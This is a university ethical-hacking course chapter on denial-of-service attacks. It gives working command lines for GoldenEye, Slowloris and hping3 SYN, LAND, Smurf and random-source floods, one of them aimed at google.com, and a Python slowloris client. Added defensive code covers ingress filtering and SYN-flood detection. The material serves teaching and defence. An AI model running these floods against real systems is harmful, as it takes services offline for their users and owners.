BNCS312 - Introduction To Ethical Hacking: Denial of Service

This chapter discusses denial of service (DoS) attacks. It defines DoS and distributed DoS (DDoS) attacks, and explains how they work to overwhelm the resources of targeted systems. Specifically, it covers types of DoS attacks like single-source vs. multiple sources, botnets used in DDoS attacks, and tools like GoldenEye and Slowloris that can be used to perform DoS/DDoS attacks. It also discusses challenges around defending against such attacks.

BNCS312 – Introduction to Ethical Hacking

CHAPTER 4
Denial of Service

©ISBATUNIVERSITY–2023 Bachelors of Networking and Cyber


Chapter Overview

• Understanding Denial of Service
• Types of Denial-of-Service Attacks
• DDoS Attack Classifications
• How to perform DDoS attacks
• Defenses against DoS attacks

How can a service be denied?

Using up resources is the most common approach. Several ways:

• Crash the machine
• Put it into an infinite loop
• Crash routers on the path to the machine
• Use up a machine resource (CPU, memory, connection table, disk)
• Use up a network resource (link bandwidth, router state)
• Deny another service this one depends on (e.g. DNS)
What is Denial of Service?

What Is a DoS Attack?

A DoS (denial-of-service) attack is a cyberattack that makes a computer or other device unavailable to its intended users. This is usually accomplished by overwhelming the targeted machine with requests until normal traffic can no longer be processed. In a DoS attack a single computer launches the attack. This differs from a DDoS (distributed denial-of-service) attack, in which multiple systems overwhelm a targeted system simultaneously.

What Is a DDoS Attack?

A DDoS (distributed denial-of-service) attack happens when multiple systems overwhelm the bandwidth or resources of a targeted system. A DDoS attack uses many sources of attack traffic, often in the form of a botnet, which makes source-based filtering far harder than for a single-source DoS.
[Diagrams: DoS from a single source; DoS from multiple sources; DDoS, with the collateral damage points marked along the paths to the victim]
DDoS Botnets

Botnet:
A collection of compromised computers that are controlled for the purpose of carrying out DDoS attacks or other activities. Botnets can be very large. Systems join a botnet when they become infected by certain types of malware.

Like a virus, but instead of damaging the system the malware takes it over and controls it. Infection typically happens:
• Through email attachments, website links, or IM links
• Through unpatched operating system vulnerabilities

Botnets use a multi-tier design: the attacker talks to a small number of master (command-and-control) hosts, which in turn control the infected machines (zombies) that actually generate the attack traffic.

[Diagram: multi-tier botnet, attacker -> masters -> zombies -> victim]
How to perform DoS/DDoS attacks
Common DoS/DDoS Attack Tools
• GoldenEye
• Slowloris
• hping3 and many more…

Tool 1: GoldenEye
GoldenEye is an HTTP-layer (layer 7) DoS test tool written in Python. It opens many concurrent sockets to the target and keeps sending HTTP GET/POST requests with randomised headers, so each request looks like legitimate browser traffic and cannot be dropped by a simple signature.

The heavy load comes from one attacking host opening many sockets in parallel; GoldenEye does not use a botnet. On its own it is a single-source DoS tool, although several hosts running it against the same target amount to a DDoS.

GoldenEye is an open-source tool, so you can download it from GitHub free of cost.

It can be used to stress-test any web server, but run it only against servers you own or are authorized to test.

Installation
Step 1: Open your Kali Linux and then open a terminal. Use the following command to install the tool by cloning the GitHub repository.

git clone https://github.com/jseidl/GoldenEye.git

Step 2: Use the following command to move into the GoldenEye directory.

cd GoldenEye

Step 3: Use the following command to list the contents of the directory, and the second command to run the tool.

ls

./goldeneye.py

Step 4: The tool asks for a URL, which means it is running successfully.

Step 5: Use the command below to see how the tool is used (its options).

./goldeneye.py -h

Usage
Example 1: Use the GoldenEye tool to flood a web server. '-s' specifies the number of concurrent sockets.

./goldeneye.py https://www.google.com -s 1000

The tool reports that it is running and has started attacking the domain www.google.com. Do this only in a lab: flooding a site you do not own or have written permission to test (such as google.com) is illegal in most jurisdictions. The tool is useful for security researchers testing the resilience of their own servers.

Example 2: To display all usage options of the GoldenEye tool, type the following command (no root privileges are needed)

./goldeneye.py -h

Example 3: To send traffic in 'random' mode (GET and POST mixed) with 5 workers running 10 sockets each. '-w' is the number of workers, '-s' the sockets per worker and '-m' the HTTP method (get, post or random).

./goldeneye.py http://192.168.0.233:80/ -w 5 -s 10 -m random

Slowloris DoS Attack

Slowloris is a free and open-source tool available on GitHub. It is a small script written in Python, and we can perform a denial-of-service attack with it.

This tool allows a single machine to take down another machine's web server using what looks like legitimate HTTP traffic. It makes full TCP connections, sends an incomplete HTTP request on each, and then sends one more header line at long, regular intervals so the server keeps waiting for the request to finish. Only a few hundred such connections are needed to fill the connection pool of a thread- or process-per-connection server such as Apache with the prefork MPM, so the tool needs very little bandwidth to exhaust the available connections. Event-driven servers such as nginx are far less affected, because an idle connection costs them almost nothing.

Uses of Slowloris:

• Slowloris holds many half-finished HTTP requests open on the target, exhausting its connection slots with very little traffic.
• Slowloris can be used to perform a DoS attack on any web server that dedicates a thread or process to each connection.
• It is an open-source tool, so you can download it from GitHub free of cost.
• It uses perfectly legitimate-looking HTTP traffic: full TCP handshakes and valid header lines, just never a complete request.
• A denial-of-service attack can be executed with Slowloris from a single machine; no botnet is required.

Step 1: Open your Kali Linux and then open your terminal.

Step 2: Create a new directory on the Desktop named Slowloris using the following command.
mkdir Slowloris

Step 3: Move into the directory that you have created (Slowloris).

cd Slowloris

Step 4: Now clone the Slowloris tool from GitHub so that you can install it on your Kali Linux machine. For that, type the following command in your terminal within the Slowloris directory that you have created.

git clone https://github.com/gkbrk/slowloris.git

You have successfully installed the Slowloris tool in your Kali Linux. Now it's time to perform a denial of service using the following steps.

Step 5: Go to the Action bar and click on "split terminal vertically"; you will now see two terminal panes.

Step 6: Check the IP address of your machine with the following command.
ifconfig

Step 7: Now that we have our IP address, start the Apache server using the following command.

sudo service apache2 start

Step 8: Check whether the server is active by running the following command.
service apache2 status

Step 9: The server shows active status, which means it is running properly. Now come back to the first terminal, change into the cloned directory (cd slowloris), and to check the files and their permissions run the following command.

ls -l

Step 10: Now run the tool using the following command ('-s' is the number of sockets to hold open).

python3 slowloris.py (your ip address) -s 500

Step 11: The tool has started attacking the IP address you gave it. To check whether it is working, open your browser and type that IP address in the URL bar: the site keeps loading and never opens. This is how Slowloris works: the 500 held-open connections fill Apache's worker pool, so the browser's new connection is never served.
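The following is an added example, not code from the course slides or from the gkbrk/slowloris project. It pairs a throw-away request-header reader (a stand-in for the web server) with a slowloris-style client that sends an unfinished request and then trickles one header line at a time, and runs the two against each other on loopback. The timeouts, socket count and interval are assumptions chosen so that a run finishes in about two seconds. With only a per-read idle timeout (the classic Apache "Timeout" behaviour) every trickled line resets the clock and the server holds all connections until the client gives up; with an overall header deadline (the job of mod_reqtimeout's RequestReadTimeout in Apache) the same connections are dropped after a fixed time.

```python
"""Slowloris mechanics and the header-deadline defence, demonstrated on loopback.

Added example (not part of the course slides): a minimal request-header reader
standing in for a web server, plus a slowloris-style client. Timeouts and socket
counts are assumptions chosen for a short demo run.
"""
import socket
import threading
import time


def read_request_header(conn, idle_timeout, header_deadline=None):
    """Read until the blank line that ends an HTTP request header.

    idle_timeout    -- max seconds between two chunks; a trickling client resets
                       it on every chunk, which is the weakness Slowloris exploits.
    header_deadline -- max seconds for the whole header (mod_reqtimeout style);
                       None means no overall limit.
    Returns 'complete', 'timeout' or 'closed'.
    """
    start = time.monotonic()
    buf = b""
    while b"\r\n\r\n" not in buf:
        wait = idle_timeout
        if header_deadline is not None:
            wait = min(wait, header_deadline - (time.monotonic() - start))
            if wait <= 0:
                return "timeout"
        conn.settimeout(wait)
        try:
            chunk = conn.recv(1024)
        except socket.timeout:
            return "timeout"
        except OSError:
            return "closed"
        if not chunk:
            return "closed"          # client went away before finishing the header
        buf += chunk
    return "complete"


def slowloris_client(host, port, sockets, interval, duration):
    """Open `sockets` connections, send an unfinished request on each and keep
    them alive with one extra header line every `interval` seconds for `duration`."""
    conns = []
    for _ in range(sockets):
        s = socket.create_connection((host, port))
        s.sendall(b"GET / HTTP/1.1\r\nHost: lab\r\nUser-Agent: slowloris-demo\r\n")
        conns.append(s)
    end = time.monotonic() + duration
    while time.monotonic() < end and conns:
        time.sleep(interval)
        for s in list(conns):
            try:
                s.sendall(b"X-a: b\r\n")   # keeps the header open, never ends it
            except OSError:               # server closed the connection: the defence worked
                conns.remove(s)
    for s in conns:
        s.close()


def run_experiment(idle_timeout, header_deadline, sockets=5, interval=0.1, duration=1.0):
    """Serve `sockets` connections with the given timeouts while a slowloris
    client trickles headers at them; return how each connection ended."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(sockets)
    srv.settimeout(5)
    port = srv.getsockname()[1]
    outcomes, handlers = [], []

    def handle(conn):
        with conn:
            outcomes.append(read_request_header(conn, idle_timeout, header_deadline))

    def accept_loop():
        for _ in range(sockets):
            conn, _ = srv.accept()
            t = threading.Thread(target=handle, args=(conn,))
            t.start()
            handlers.append(t)

    acceptor = threading.Thread(target=accept_loop)
    acceptor.start()
    slowloris_client("127.0.0.1", port, sockets, interval, duration)
    acceptor.join()
    for t in handlers:
        t.join()
    srv.close()
    return {k: outcomes.count(k) for k in ("complete", "timeout", "closed")}


if __name__ == "__main__":
    # Idle timeout only: each trickled line resets the clock, so the server holds
    # every connection until the client closes them itself.
    print("idle timeout only :", run_experiment(idle_timeout=1.0, header_deadline=None))
    # Overall header deadline: every connection is dropped after 0.3 s.
    print("header deadline   :", run_experiment(idle_timeout=1.0, header_deadline=0.3))
```

The second run is the fix to apply on a real Apache (RequestReadTimeout from mod_reqtimeout, plus a sane MaxRequestWorkers and, ideally, an event-driven MPM or a reverse proxy in front); the first run is why raising "Timeout" alone does not help.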

DoS Flood With hping3
DoS Attack with hping3
Run the command: hping3 --flood -S -V --rand-source -p 80 stv.com

hping3 takes a hostname or IP address, not a URL, and needs root to craft packets. Where:

--flood send packets as fast as possible, without waiting for replies
-S set the SYN flag, i.e. a legitimate-looking TCP connection request
-V verbose mode
-p 80 destination port (the default is port 0, which no real service listens on)
--rand-source randomize the IP source address, so the packets look like they come from different systems (a sort of DDoS)

Port Scanning with hping3:
It is simple to perform port scanning on any host with hping3. The first command below scans a range of ports; the second probes a single port.
• # hping3 -S --scan 21-500 Target
• # hping3 -S -p 80 Target

2. SYN Flood Attack

A SYN flood is also known as a half-open attack. The attacker sends a stream of TCP SYN (connection request) packets and never completes the three-way handshake, so the target's backlog fills with half-open connections and legitimate clients can no longer connect. From a single host this is a DoS; from many hosts, or with spoofed sources, it looks like a DDoS to the victim.

# hping3 -S -p 80 Target --flood

3. LAND Attack

This is a kind of DoS attack in which a packet is sent to the target machine with the source address spoofed to be the same as the destination address, so a vulnerable host replies to itself. The command below demonstrates it against the local host; against a real target, the -a (spoofed source) value would be the target's own address.

# hping3 -S -p 80 127.0.0.1 -a 127.0.0.1

4. Smurf Attack:
This is a kind of DDoS attack built on a spoofed source address: the attacker sends ICMP echo requests to a network's broadcast address with the victim's address as the source, so every host on that network replies to the victim. The attack is amplified by the number of hosts that answer the broadcast.

# hping3 --icmp --flood 127.0.0.1 -a 127.0.0.1

Run the command and check the response in Wireshark: multiple spoofed ICMP packets are sent within a second and flood the destination. Note that this command only shows the spoofed-source ICMP flood; a full Smurf needs a broadcast destination on a network whose router still forwards directed broadcasts, which most routers now disable by default.

5. Random Source Attack
In this attack, an attacker sends many packets with different, randomly generated source addresses to the target machine, which from a single host produces the effect of a distributed denial of service. It is difficult to identify the actual source address after an incident occurs, and blocking individual sources is useless.

The output is highlighted in the packet analyzer tool (Wireshark).

# hping3 -S -p 80 Target --flood --rand-source

Are we safe from DDoS?

"My machine is well secured."
It does not matter. The problem is not your machine but everyone else's.

"I have a firewall."
It does not matter. We slip in with legitimate traffic, or we bomb your firewall.

"I use a VPN."
It does not matter. We can fill your VPN pipe.

"My system is highly provisioned."
It does not matter. We can get more resources than you have.

Why DoS Defense is difficult
Conceptual difficulties
Mostly random source packets, so there is no single address to block
Moving filtering upstream requires communication with other organizations

Practical difficulties
Routers don't have many spare cycles for analysis/filtering
Networks must remain stable, so there is a bias against infrastructure change
Attack tracking can cross administrative boundaries
End-users/victims often see the attack differently (more urgently) than network operators

Nonetheless, we need to:

Maximize filtering of bad traffic
Minimize "collateral damage"
Defenses against DoS attacks

DoS attacks cannot be prevented entirely

It is impractical to prevent flash crowds (legitimate surges in demand) without compromising network performance, and attack traffic is designed to look like one
Three lines of defense against (D)DoS attacks
Attack prevention and preemption
Attack detection and filtering
Attack source traceback and identification

Attack prevention
Limit the ability of systems to send spoofed packets
Filtering done as close to the source as possible by routers/gateways
Reverse-path filtering ensures that the route back to the claimed source goes out of the interface the packet arrived on
Ex: on a Cisco router, the "ip verify unicast reverse-path" interface command
Rate controls in upstream distribution nets
On specific packet types
Ex: some ICMP, some UDP, TCP/SYN
Block IP directed broadcasts (removes the Smurf amplifier)
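To make the prevention measures above concrete, here is an added example (not part of the course material) of the decisions a border router makes on each inbound packet: a strict reverse-path check equivalent to "ip verify unicast reverse-path", a bogon prefix list, the LAND check, a directed-broadcast block, and a per-destination token bucket for TCP SYNs. The routing table, subnets, bogon list and packets are constructed for the demo using RFC 5737 documentation addresses; a real router answers the reverse-path question from its forwarding table rather than from a dictionary.

```python
"""Source-address checks a border router applies to each inbound packet.

Added example for the 'Attack prevention' slide; not part of the course
material. The routing table, subnets, bogon list and packets are constructed.
"""
import ipaddress
from collections import defaultdict

WAN = "wan0"
# Constructed routing table: prefix -> interface the route points out of.
ROUTES = {
    "192.0.2.0/24": "lan0",        # customer LAN behind lan0
    "198.51.100.0/24": "lan1",     # customer LAN behind lan1
    "0.0.0.0/0": WAN,              # default route towards the ISP
}
LOCAL_SUBNETS = ["192.0.2.0/24", "198.51.100.0/24"]
# Sources that must never arrive from the Internet (a minimal bogon list).
BOGONS = [ipaddress.ip_network(p) for p in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4")]


def route_lookup(table, addr):
    """Longest-prefix match: the interface the router would use to reach addr."""
    best_len, best_iface = -1, None
    for prefix, iface in table.items():
        net = ipaddress.ip_network(prefix)
        if addr in net and net.prefixlen > best_len:
            best_len, best_iface = net.prefixlen, iface
    return best_iface


def rpf_check(table, src, ingress):
    """Strict uRPF (Cisco 'ip verify unicast reverse-path'): accept only if the
    route back to the source points out of the interface the packet came in on."""
    return route_lookup(table, src) == ingress


def is_directed_broadcast(dst, subnets):
    return any(dst == ipaddress.ip_network(s).broadcast_address for s in subnets)


class SynRateLimiter:
    """Token bucket per destination, applied to TCP SYNs only: the 'rate
    controls on specific packet types' that upstream networks apply."""

    def __init__(self, rate, burst):
        self.rate, self.burst = rate, burst
        self.tokens = defaultdict(lambda: float(burst))
        self.last = {}

    def allow(self, dst, now):
        elapsed = now - self.last.get(dst, now)
        self.tokens[dst] = min(self.burst, self.tokens[dst] + elapsed * self.rate)
        self.last[dst] = now
        if self.tokens[dst] >= 1:
            self.tokens[dst] -= 1
            return True
        return False


def ingress_filter(pkt, limiter, table=ROUTES, subnets=LOCAL_SUBNETS):
    """pkt: dict(ts, src, dst, iface, proto, flags). Returns 'accept' or a drop reason."""
    src, dst = ipaddress.ip_address(pkt["src"]), ipaddress.ip_address(pkt["dst"])
    if src == dst:
        return "drop:land"                  # LAND: source spoofed to equal the destination
    if pkt["iface"] == WAN and any(src in b for b in BOGONS):
        return "drop:bogon"                 # private/loopback/multicast source from outside
    if not rpf_check(table, src, pkt["iface"]):
        return "drop:rpf"                   # claimed source does not live behind this interface
    if pkt["iface"] == WAN and is_directed_broadcast(dst, subnets):
        return "drop:directed-broadcast"    # keeps our LANs from acting as Smurf amplifiers
    if pkt["proto"] == "tcp" and pkt["flags"] == "S" and not limiter.allow(pkt["dst"], pkt["ts"]):
        return "drop:syn-rate"              # SYN rate control for this destination
    return "accept"


def pkt(ts, src, dst, iface, proto="tcp", flags="S"):
    return dict(ts=ts, src=src, dst=dst, iface=iface, proto=proto, flags=flags)


# Constructed packets; the expected verdict is in each comment.
SAMPLE = [
    pkt(0.0, "203.0.113.5", "192.0.2.10", "wan0"),               # accept
    pkt(0.0, "192.0.2.10", "203.0.113.5", "wan0"),               # drop:rpf (our address from outside)
    pkt(0.0, "192.0.2.10", "192.0.2.10", "wan0"),                # drop:land
    pkt(0.0, "10.9.8.7", "192.0.2.10", "wan0"),                  # drop:bogon
    pkt(0.0, "203.0.113.5", "192.0.2.255", "wan0", "icmp", ""),  # drop:directed-broadcast (Smurf)
    pkt(0.0, "192.0.2.77", "203.0.113.5", "lan0"),               # accept: subnet spoofing passes uRPF
    pkt(0.0, "203.0.113.5", "192.0.2.10", "wan0"),               # accept (second token)
    pkt(0.0, "203.0.113.5", "192.0.2.10", "wan0"),               # drop:syn-rate (bucket empty)
    pkt(1.0, "203.0.113.5", "192.0.2.10", "wan0"),               # accept (bucket refilled)
]


def run(packets=SAMPLE, syn_rate=2.0, syn_burst=2):
    """Filter packets in order with a fresh rate limiter; returns the verdicts."""
    limiter = SynRateLimiter(syn_rate, syn_burst)
    return [ingress_filter(p, limiter) for p in packets]


if __name__ == "__main__":
    for p, verdict in zip(SAMPLE, run()):
        print(f"{p['iface']:5} {p['src']:>14} -> {p['dst']:<14} {verdict}")
```

The sixth packet is the limit of this defence: a host on lan0 spoofing another address from the same /24 passes strict uRPF, which is the "subnet spoofing" that the trends slide notes defeats ingress filtering. Only per-port filtering (one address per switch port) or host-level controls close that gap.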

Responding to attacks

Need a good incident response plan

With contacts for your ISP
Needed to impose traffic filtering upstream
Details of the response process
Ideally have network monitors and an IDS
To detect and notify on abnormal traffic patterns

Responding to attacks cont’d ….

Identify the type of attack

Capture and analyze packets
Design filters to block attack traffic upstream
Identify and correct the system/application bugs the attack exploits
Have the ISP trace the packet flow back to its source
May be difficult and time consuming
Necessary if legal action is desired
Implement the contingency plan
Update the incident response plan
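As an added example for the "capture and analyze packets / design filters" steps (not part of the course material), the script below analyses a constructed packet capture containing a normally used service, a random-source SYN flood of the kind `hping3 -S -p 80 Target --flood --rand-source` produces, and a two-host half-open flood. For each destination port it counts SYNs whose source never completed the handshake and how spread out the sources are, then says whether a source-based upstream filter is even possible. The thresholds (min_syns, half_open_ratio, random_src_ratio), the addresses and the records are assumptions made up for the demo; a real detector would read a pcap or NetFlow export and evaluate a sliding window.

```python
"""Detecting a SYN flood with randomised sources in a packet capture.

Added example for the 'Responding to attacks' slides; not part of the course
material. Records are constructed to resemble a capture of an hping3
random-source SYN flood mixed with normal traffic.
"""
import random
from collections import Counter, defaultdict

TARGET = "192.0.2.10"   # constructed victim address (RFC 5737 documentation range)


def build_sample_capture(seed=1):
    """Constructed capture of (timestamp, src, dst, dport, flags) tuples.
    Flags use tcpdump notation: 'S' = SYN, '.' = bare ACK (handshake completed)."""
    rng = random.Random(seed)
    pkts = []
    # Ten legitimate clients on 443: each SYN is followed by the client's ACK.
    for i in range(10):
        t, src = i * 0.1, f"198.51.100.{i + 1}"
        pkts.append((t, src, TARGET, 443, "S"))
        pkts.append((t + 0.02, src, TARGET, 443, "."))
    # hping3-style random-source flood on 80: 300 SYNs in 0.3 s, none acknowledged.
    for i in range(300):
        src = f"{rng.randint(1, 223)}.{rng.randint(0, 255)}.{rng.randint(0, 255)}.{rng.randint(1, 254)}"
        pkts.append((5.0 + i * 0.001, src, TARGET, 80, "S"))
    # A two-host half-open flood on 22, where blocking the sources still helps.
    for i in range(150):
        pkts.append((9.0 + i * 0.002, f"203.0.113.{9 + i % 2}", TARGET, 22, "S"))
    return sorted(pkts)


def analyse_syns(packets, min_syns=100, half_open_ratio=0.9, random_src_ratio=0.8):
    """Per (dst, dport): count SYNs, how many came from sources that never
    completed a handshake, and how many distinct sources there were.
    Returns {(dst, dport): report} with a verdict and a suggested block list."""
    by_service = defaultdict(list)
    for ts, src, dst, dport, flags in packets:
        by_service[(dst, dport)].append((ts, src, flags))

    reports = {}
    for key, recs in by_service.items():
        syn_per_src = Counter(src for _, src, f in recs if f == "S")
        acked = {src for _, src, f in recs if f == "."}
        syns = sum(syn_per_src.values())
        half_open = sum(n for src, n in syn_per_src.items() if src not in acked)
        span = max(ts for ts, _, _ in recs) - min(ts for ts, _, _ in recs)
        report = {
            "syns": syns,
            "half_open": half_open,
            "distinct_sources": len(syn_per_src),
            "syns_per_second": round(syns / span, 1) if span > 0 else float(syns),
            "block": [],
        }
        flood = syns >= min_syns and half_open >= half_open_ratio * syns
        if not flood:
            report["verdict"] = "normal"
        elif len(syn_per_src) >= random_src_ratio * syns:
            # Almost every SYN has its own source: a --rand-source flood. Source
            # filtering is pointless; rate-limit SYNs to this port upstream and
            # enable SYN cookies on the host instead.
            report["verdict"] = "syn-flood-random-source"
        else:
            report["verdict"] = "syn-flood-few-sources"
            report["block"] = [src for src, _ in syn_per_src.most_common(5)]
        reports[key] = report
    return reports


if __name__ == "__main__":
    for (dst, dport), rep in sorted(analyse_syns(build_sample_capture()).items()):
        print(f"{dst}:{dport:<4} syns={rep['syns']:<4} half_open={rep['half_open']:<4} "
              f"sources={rep['distinct_sources']:<4} {rep['syns_per_second']:>7}/s  "
              f"{rep['verdict']}  {rep['block']}")
```

The distinction the verdict draws is the one the slides keep returning to: a few-source flood can be stopped by asking the ISP to filter a handful of addresses, while a random-source flood can only be mitigated by type-based rate limits upstream and SYN cookies on the host, and traced only with the ISP's cooperation.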

DDoS Attack Trends

Attackers follow defense approaches and adjust their code to bypass the defenses

Use of subnet spoofing (source addresses taken from the attacker's own subnet) defeats ingress filtering
Use of encryption and decoy packets, IRC or P2P obscures master-slave communication
Encryption of attack packets defeats traffic analysis and signature detection
Pulsing attacks (short bursts with pauses) defeat slow defenses and traceback
Flash-crowd attacks generate legitimate-looking application traffic

Thank you

